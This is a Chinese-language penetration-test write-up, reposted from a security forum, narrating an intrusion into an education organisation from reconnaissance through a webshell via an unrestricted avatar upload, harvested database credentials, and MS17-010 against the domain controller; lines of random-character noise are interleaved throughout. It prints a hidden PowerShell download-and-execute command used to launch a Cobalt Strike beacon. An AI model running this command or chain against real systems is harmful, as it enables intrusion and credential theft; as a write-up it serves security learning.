9 M+ r. q( b* @: Y" m# H 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路- r0 h# I( Y5 H9 d+ j4 v1 Q6 r
1 ?: X* G3 T( _+ ?
+ z e, l* X/ o: h
6 H. m* J7 `, X/ f! s ( B4 |% g5 L1 x2 P0 b/ T5 k
2 i/ Z3 v( h1 {& P* s( N 正文. |1 }+ B( Y- e& K; g: Z
0 H6 O$ T& W0 Z4 A2 Q4 T" g
% n: _: `6 ^8 M0 m
7 `$ J* G7 b/ h3 r
) u6 u' z! c f8 \8 o" ?& k* T: g/ t( Q3 B! d+ L; f% ~
目标:www.xxxx.com(一家教育机构) 3 m% x$ | t$ M2 \9 A$ i6 J
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能" [( v- ]8 ?8 L' C) L
6 G1 X: U, Q+ i6 w1 f0 U$ I* {- Y: ^" W) p
' ]+ g+ S! j5 [
5 y# }7 ]. R, X) S t5 R
2 _& u* a" d/ S0 j, }. @ 进行了简单的信息搜集
9 q* y3 q: G! ` D6 K( m" L
7 L* }9 E: R! [
# D* ~2 u; G; ?: y, S0 U0 q+ L ! P8 W! ^) z, m6 n
- C" J! o1 @/ v" V
子域名搜集6 G7 H: @+ i; x2 T7 G
* i- v8 c# W6 |6 n) g
' Z; y. v# o: [1 N ) [( ~7 p4 ~7 l" ?5 c
' x+ _% k9 B9 L" F* J, G" f4 {* U/ d6 W2 h
fofa找资产 , Z4 F. l+ }) V2 I
8 M6 } ]5 B% C+ O3 @" D w) @; }; M( F7 k6 o1 j; Q: F
6 f& s) \- s' t6 b/ d& {
) T5 ~( k# {- l' |
+ @4 |! ^( r7 E2 g 0 K$ y/ H, g: X. P n c9 B% v/ i
3 h+ L* `0 K# F9 M1 W
一共七个资产。去重之后只有两个。
, I: z9 r6 n E+ z! O. [! U 5 X, ^. s6 D0 ?3 u9 i0 {& H$ U
# Z1 i' L0 o1 H+ p$ E8 e
2 D4 P5 @0 Z' y9 c6 [
$ b& Y& C2 V6 I( M. i6 A& { 目录探测
( A/ f; w7 E0 A& [3 z( R
! _ q3 o# F# M9 l7 {7 q! j" u. k" r: `
$ h J& L$ a0 |" W. I/ I % F- N6 |& `# S
: ?5 b3 E: x/ M1 D4 g: f+ L$ I
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 9 r, l$ M6 [1 e) c9 }4 C
1 d2 R8 o3 B6 Q% T
4 K/ P+ d8 W# C+ p# z+ A
$ F; u A* K; R U; q1 {* F1 |
1 B3 k' A' ~% B! C1 K 我又尝试了通过修改返回包来绕过登录界面
& g7 v. ^! t1 O1 S, W , A, k+ H# I3 W/ ]+ c) [# k( R9 k
( u$ `! Y% M; ]% U
% P/ u/ f7 Q& _
5 d$ G% P1 c. L% _! f& u6 ~
; s5 v, e e1 I6 w/ T# c: }4 D 还是不行,尝试注入无果
, x7 o5 N2 R C9 C' y9 n4 d" E 3 N) X4 A7 C. v# E5 W
3 p# k7 |# W# H ?" b" Y9 R
( J8 |' H% |0 a$ r% f
6 k) U4 q' Q$ |1 b4 L4 d# t c! @1 @9 Q/ i- ^8 P2 \( c1 u* v
不过我目录探测出了一处Spring信息泄露 5 T1 y( l" N& D; j/ Y7 H
# m- G' X# i' D# X7 J0 ]
! y. E. v9 _7 \, o5 ?
- W3 S1 n; m! a( F: p$ e
# J1 F" {3 F( f+ M 5 j, i( n) Q2 Z" E( x
" v7 T5 J! i( D! @0 _
9 _+ I$ R- \5 W1 s* ? 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录+ H2 d1 J/ j% s# h$ V; p
3 M# s: @8 {& @% X
# E0 G l) r) g3 `# W) Y5 P( W9 k7 b * I+ K5 B- A$ w( H* \5 O! ?5 W z
+ C9 `$ d$ e% l' I$ j
( }0 y; w4 s( h5 }! _! t
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& B: |. I& R8 v
2 e9 h3 ?( B' u. R' Z1 e- q
% X3 H3 K, Y; d1 H0 q
7 o, t/ [; n) M* h/ s4 I" W) e4 N3 m
; c( A# g" p7 f* \
; R# i4 i+ \- ~; T2 _ s9 R 获取有些师傅到这一步就手机抓包电脑测了。
3 ~4 N1 w1 S% b% p9 n4 d 7 ` A g3 F/ g: o) s
: C3 {% J' p9 z; A/ p3 b" T
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( D5 Z. P; w; r9 _3 ~) i
- j% |2 n2 P$ ^$ \5 I8 A4 E
3 l S7 X6 z1 x( [2 M
其中在一个公众号发现了小程序,可以进行注册。
- I8 s9 m3 G9 Y, o: k, b" B
4 a1 [/ S# ~ e+ O0 I6 P% C8 A0 Z6 u" C0 F; N5 a
看到了头像上传,尝试上传获取WebShell" |0 ]* p) n9 m3 {/ N, J p4 I
! a7 ^% @' F) F# n; O
+ I0 R5 c$ S9 r: m! G. w# A, `
7 u( ]3 W3 w) _- N4 U( R
7 f, @& ~) [1 m8 w
, k( U8 T( Z9 X0 G6 ~8 Y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
4 Q# A. |% M5 O; r7 I. s & w7 o, K6 o0 }/ |0 i/ K
+ x a8 n9 G& C3 X
+ h- b) `5 ?$ e. v# X! ^: y6 Q/ A+ [
( s7 Y/ H* ~7 k6 H" @8 J
- z7 S0 S( c0 D# V; U
然后上了大马
' w& p# Q7 E3 n+ ?$ Y8 | ; w' Q) S3 k8 Q
- d9 h3 \( P& G
) T& l! t9 g9 W @0 k / K% T" L5 U( @0 [- I+ B2 S9 D
! r0 k2 ^: n0 e/ I8 O% C/ M 2 N* o6 g7 |; U+ |( W+ J
6 x' w7 }3 \7 W$ E, ]: w D
$ r% S7 D3 b+ k/ Q7 B: A) O3 W Z5 R 通过翻找文件发现数据库账号密码5 j5 f5 e1 S7 E$ h$ Z) }* j
; s, T' u2 g# a
z/ ]2 @; v% T / d9 l9 v, r' j1 ~5 M
7 V( Z( C. Y6 F, f- ~" t3 O e0 R6 _
f$ m" D5 [' a6 L$ G6 `. j --内网渗透
" E N1 o5 b2 m/ a5 P + K) \: q; r; A& n/ m5 Q2 B( ]- k0 ^
( Z+ A2 |( f4 w2 G 直接通过powershell执行 cs上线$ _3 w4 h$ h1 B' U0 m
& a5 |2 f" @6 n/ C) ~4 k( T
0 \. Q' E7 @# K4 \! |; [
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
/ q8 h; Z0 A" D, I* }# B " [1 L5 h3 A& ^
9 q& r0 k5 v" }/ y4 [: } & E4 j: ~" m- G% f, u
- } t; r, A2 r m" J5 k0 Y$ S# i; Z: R
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
7 t5 R! l+ a& Y9 _1 U
6 Q$ ?4 ^ Q- w1 }
6 J7 u( N: t# Y( t: a
- R: F# A4 L# U8 q3 e1 t5 J
n# [6 g- ^4 C; [$ \+ H9 z
. q* @) O# V V2 y+ b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 5 e$ K {+ c8 \) i' {2 P! X; P" c3 E
4 c, B5 H& p }) z3 {, u
# K9 g8 a X& ~5 [) Q( n4 j0 }+ E# t4 E. p! B9 G5 C4 S
4 N) u6 w1 z& ?2 N1 l1 u5 K
* G* A/ p5 B7 t* W7 h$ q, c
1 G, T! P$ I/ ~* w * D0 S' ~7 h% t/ ^0 X( j
h/ V. W6 t4 x/ G& [
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 6 r9 l r# D2 H; z/ g% a
2 m5 [: J1 ?' [" ]& f- x
% K. f" e0 _3 P$ b
6 m& }# q5 {, ?& M
4 }7 a( z ? ^5 Y . e3 b3 `& g" [
0 ~0 b9 H7 z/ G" B+ y: Q( t+ l4 m" q1 {' l# G9 ~% b7 {2 t$ N8 M
6 ]* L" W6 Z7 F) M) B 0 ], W2 F3 K" U; K4 Q+ D
" x# G8 A: l( K& u
" h) M3 `7 w. y
$ `) O" u/ Q1 s) C 4 H! o. ~) m3 ]1 ^# g
+ K( |7 j R8 c
, B% }4 f7 c: A. w2 @8 z2 ~ 小结- y6 q2 ~: `4 p4 p3 H
" a3 c- i {& G% I! J: |6 T
6 M$ v+ G( V( S- X; ^- B# S 0 Q- N9 `+ X% j$ u) c" p; i0 G
! D) t1 D! T: l
3 F0 ~4 u Z( _" m$ U 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
6 G0 G9 u# r2 g
% ~4 R( I& }; F- m- T
) l* _. s& l: ? : m$ d! _$ ]1 Y0 h8 B5 g
+ f' h# x: s3 n1 M9 D
+ D! |# w6 v0 F1 c - ' [- u: _, q" g+ x; {; j
1 T. U! d; Y0 i$ x1 h- l
: O" W# L3 U5 C( o
-
: G2 u( F# j0 c/ _4 T/ D
, j1 P7 @5 ?2 H( P0 P
( _: u4 Y9 U" h! M$ K
( Q4 Y' ?3 G3 Y) Y( f/ F
n/ c: n* X- U! h 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
) U- @* Z S! {( L U. a" l/ R J J# e) P9 S# ]+ E
( w0 j9 {7 s6 D" X: }- b ' o, Y; Z# M/ v5 A9 @- U! U/ i7 C
|